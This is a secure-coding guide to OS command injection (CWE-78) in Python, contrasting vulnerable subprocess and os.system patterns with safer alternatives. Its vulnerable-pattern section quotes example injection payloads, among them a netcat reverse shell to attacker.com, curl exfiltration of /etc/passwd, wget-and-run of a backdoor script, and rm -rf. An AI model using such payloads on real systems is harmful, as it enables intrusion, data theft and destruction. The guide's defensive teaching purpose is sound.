CWE-78: OS Command Injection - Python
Overview
OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.
Primary Defence: Use Python native libraries (pathlib, requests, etc.) instead of system commands, or if unavoidable, use subprocess.run() with argument lists and shell=False (never shell=True).
Remediation Strategy
PRIMARY FIX - Avoid System Calls
Use Python native libraries instead of executing commands
- This eliminates the vulnerability entirely
- Do NOT use subprocess or os.system() if a Python library exists
SECONDARY FIX - Use subprocess.run() with Argument List
Set shell=False, pass arguments as list
- WARNING: Only use if Priority 1 is not possible
- Must use list of arguments with
shell=False(CRITICAL)
Defense in Depth - Input Validation
Allowlist permitted characters
- Required in addition to Priority 1 or 2
- Never use validation alone
Additional Hardening - Least Privilege
Drop privileges, use resource limits
- Apply alongside other fixes
Decision Tree
Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, requests, etc.)
│ ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│ └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│ ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│ └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
├─ Add input validation (Priority 3)
└─ Apply least privilege (Priority 4)
Common Vulnerable Patterns
String Concatenation with os.system()
# VULNERABLE - Command injection via string concatenation
filename = request.GET['file']
os.system('ls -la ' + filename)
# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp
Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.
Using subprocess with shell=True
# VULNERABLE - Shell command injection
user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)
# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file
subprocess.Popen with Shell Invocation
# VULNERABLE - Invoking shell allows command injection
ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)
# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands
Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.
Unvalidated Input in subprocess.call()
# VULNERABLE - No input validation with shell=True
user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)
# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; python /tmp/m.sh"
# Result: Downloads and executes malware
Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.
Secure Patterns
Use Python Native Libraries (PREFERRED - Eliminates Command Injection)
# SECURE - Use pathlib and os modules instead of OS commands
from pathlib import Path
import os
directory = Path('/uploads')
for file_path in directory.iterdir():
stat = file_path.stat()
print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")
# More file operations
import shutil
content = Path(filepath).read_text() # Instead of "cat"
shutil.copy(source, dest) # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True) # Instead of "mkdir -p"
Path(filepath).unlink() # Instead of "rm"
Why this works: Python's pathlib and shutil modules operate directly on the filesystem through the Python runtime without invoking shell commands. This completely eliminates command injection vulnerabilities - there's no OS process to execute, no shell to interpret metacharacters like ;, |, or &&, and no possibility of command chaining. These functions are also more portable across operating systems than system commands.
Use requests Library for Network Operations
# SECURE - Use requests instead of wget/curl commands
import requests
response = requests.get(url, timeout=30)
content = response.content
# For downloads
with requests.get(url, stream=True, timeout=30) as r:
r.raise_for_status()
with open('download.file', 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.
Use tarfile/zipfile for Archives
# SECURE - Use tarfile module instead of tar commands
import tarfile
from pathlib import Path
with tarfile.open(archive, 'r:gz') as tar:
# Safe extraction with path validation
for member in tar.getmembers():
# Prevent path traversal
if member.name.startswith('/') or '..' in member.name:
raise ValueError(f'Unsafe archive member: {member.name}')
tar.extract(member, path='./extracted')
# For ZIP files
import zipfile
with zipfile.ZipFile(archive, 'r') as zip_ref:
for member in zip_ref.namelist():
if member.startswith('/') or '..' in member:
raise ValueError(f'Unsafe archive member: {member}')
zip_ref.extractall('./extracted')
Why this works: Python's tarfile and zipfile modules handle archive operations in pure Python without calling external tar, unzip, or 7z commands. Even if an attacker controls filenames within the archive, they cannot inject shell commands because no shell is invoked. The path traversal validation (checking for .. and absolute paths) prevents zip slip attacks, providing defense-in-depth.
Use re Module for Text Processing
# SECURE - Use re module instead of grep commands
import re
from pathlib import Path
content = Path(filepath).read_text()
matches = re.findall(pattern, content)
# Line-by-line processing
with open(filepath) as f:
matching_lines = [line for line in f if search_term in line]
Why this works: Python's re module and file I/O operations provide powerful text processing capabilities without executing grep, sed, awk, or other shell utilities. Processing text in-memory through Python prevents command injection while offering better performance, type safety, and cross-platform compatibility. List comprehensions and regex operations are also more maintainable than complex shell pipelines.
subprocess.run() with Argument List (If Process Execution Required)
WARNING: Avoid executing OS commands if at all possible. Python has native libraries for almost everything (requests, pathlib, zipfile, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all native alternatives first.
# USE WITH CAUTION - When process execution is unavoidable, use argument list
import subprocess
import re
ip_address = request.GET['ip']
# Validate input first
if not re.match(r'^(\d{1,3}\.){3}\d{1,3}$', ip_address):
raise ValueError('Invalid IP address')
# Use list of arguments - NO SHELL
result = subprocess.run(
['ping', '-c', '4', ip_address], # Arguments as list
capture_output=True,
text=True,
shell=False, # CRITICAL: shell=False
timeout=10
)
print(result.stdout)
Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without shell interpretation. Even if ip_address contains shell metacharacters like ; or &&, they're treated as literal argument data rather than command separators. The shell=False setting is critical - it prevents Python from invoking /bin/sh or cmd.exe, eliminating the shell layer entirely. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess.
subprocess.run() with Path Validation (For File Operations)
WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).
For file operations requiring subprocess - always validate paths.
# AVOID IF POSSIBLE - Validate paths before use
filename = request.GET['file']
# Validate filename
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
raise ValueError('Invalid filename')
# Better: Use pathlib instead of subprocess
file_path = Path('/uploads') / filename
if not file_path.resolve().is_relative_to('/uploads'):
raise ValueError('Path traversal detected')
content = file_path.read_text()
Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.
Input Validation (Defense in Depth)
Allowlist Validation
import re
def validate_filename(filename):
"""Only allow alphanumeric, underscore, dash, dot"""
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
raise ValueError('Invalid filename characters')
return filename
def validate_ip_address(ip):
"""Validate IPv4 format"""
import ipaddress
try:
ipaddress.IPv4Address(ip)
return ip
except ValueError:
raise ValueError('Invalid IP address')
Django/Flask Integration
# Django view with validation
from django.core.validators import RegexValidator
from django.core.exceptions import ValidationError
ip_validator = RegexValidator(
regex=r'^(\d{1,3}\.){3}\d{1,3}$',
message='Invalid IP address'
)
def ping_view(request):
ip_address = request.GET.get('ip', '')
try:
ip_validator(ip_address)
except ValidationError:
return HttpResponseBadRequest('Invalid IP')
# Safe to use with subprocess
result = subprocess.run(
['ping', '-c', '4', ip_address],
capture_output=True,
shell=False
)
return HttpResponse(result.stdout)
shlex for Argument Parsing (Use Carefully)
import shlex
import subprocess
# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template
cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip) # Append validated user input
subprocess.run(args, shell=False)
# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input) # Still vulnerable!
# subprocess.run(args, shell=False)
Security Best Practices
Use Timeout
try:
result = subprocess.run(
['ping', '-c', '4', ip_address],
capture_output=True,
shell=False,
timeout=10 # Prevent hanging
)
except subprocess.TimeoutExpired:
# Handle timeout
pass
Limit Resource Usage
import resource
def limit_process_resources():
"""Limit CPU and memory for subprocess"""
def set_limits():
# Limit CPU time to 30 seconds
resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
# Limit memory to 128MB
resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024,
128 * 1024 * 1024))
return set_limits
# Use preexec_fn (Unix only)
subprocess.run(
['ping', '-c', '4', ip_address],
preexec_fn=limit_process_resources(),
shell=False
)
Drop Privileges (Unix)
import os
import pwd
def drop_privileges(username='nobody'):
"""Drop privileges to specified user"""
def set_user():
pw_record = pwd.getpwnam(username)
os.setgid(pw_record.pw_gid)
os.setuid(pw_record.pw_uid)
return set_user
# Run subprocess as unprivileged user
subprocess.run(
['command'],
preexec_fn=drop_privileges('nobody'),
shell=False
)
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
- Code review: Confirm all instances use the secure pattern (parameterized queries, safe APIs, proper encoding) with no string concatenation or unsafe operations
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
Deprecated/Dangerous Functions to Avoid
# NEVER USE THESE:
os.system(cmd) # Always uses shell
os.popen(cmd) # Deprecated, uses shell
commands.getoutput(cmd) # Removed in Python 3
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)
# ALWAYS USE:
subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)